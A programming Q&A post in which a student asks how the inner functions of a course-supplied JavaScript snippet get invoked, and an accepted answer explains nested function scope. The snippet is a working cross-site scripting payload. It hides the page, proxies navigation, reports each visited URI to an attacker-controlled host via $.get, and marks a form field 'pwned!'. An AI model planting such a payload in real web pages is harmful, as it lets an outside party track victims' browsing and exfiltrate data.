# passing in data and href as function parameters in Javascript

Tags: javascript

Part of my course I am given the following code

```
function payload(attacker) {
            function log(data) {
                console.log($.param(data))
                $.get(attacker, data);
            }
            function proxy(href) {
                $("html").load(href, function(){
                    $("html").show();
                    log({event: "nav", uri: href});
                    $("#query").val("pwned!");
                });
            }
            $("html").hide();
            proxy("./");
        }
```

In the function `log` and `proxy`, how are the parameters called? In the follow up code, only `payload(attacker` is called,but I don't see how by calling `payload`, the other two functions are also called.

I see that they are also HTML tags, so is this another type of parameters that only exists in Javascripts?

Answer (score 2, accepted):

The other two are internal functions; they're just helping `payload` get its job done and exist only within its scope. Notice how at the end of the function definition there is a call to `proxy`?, that sets `href` to './' and loads some stuff, including dumping some info on the console (via the call to `log`). That's how the other functions are called. Nothing magical going on. Just follow the calls.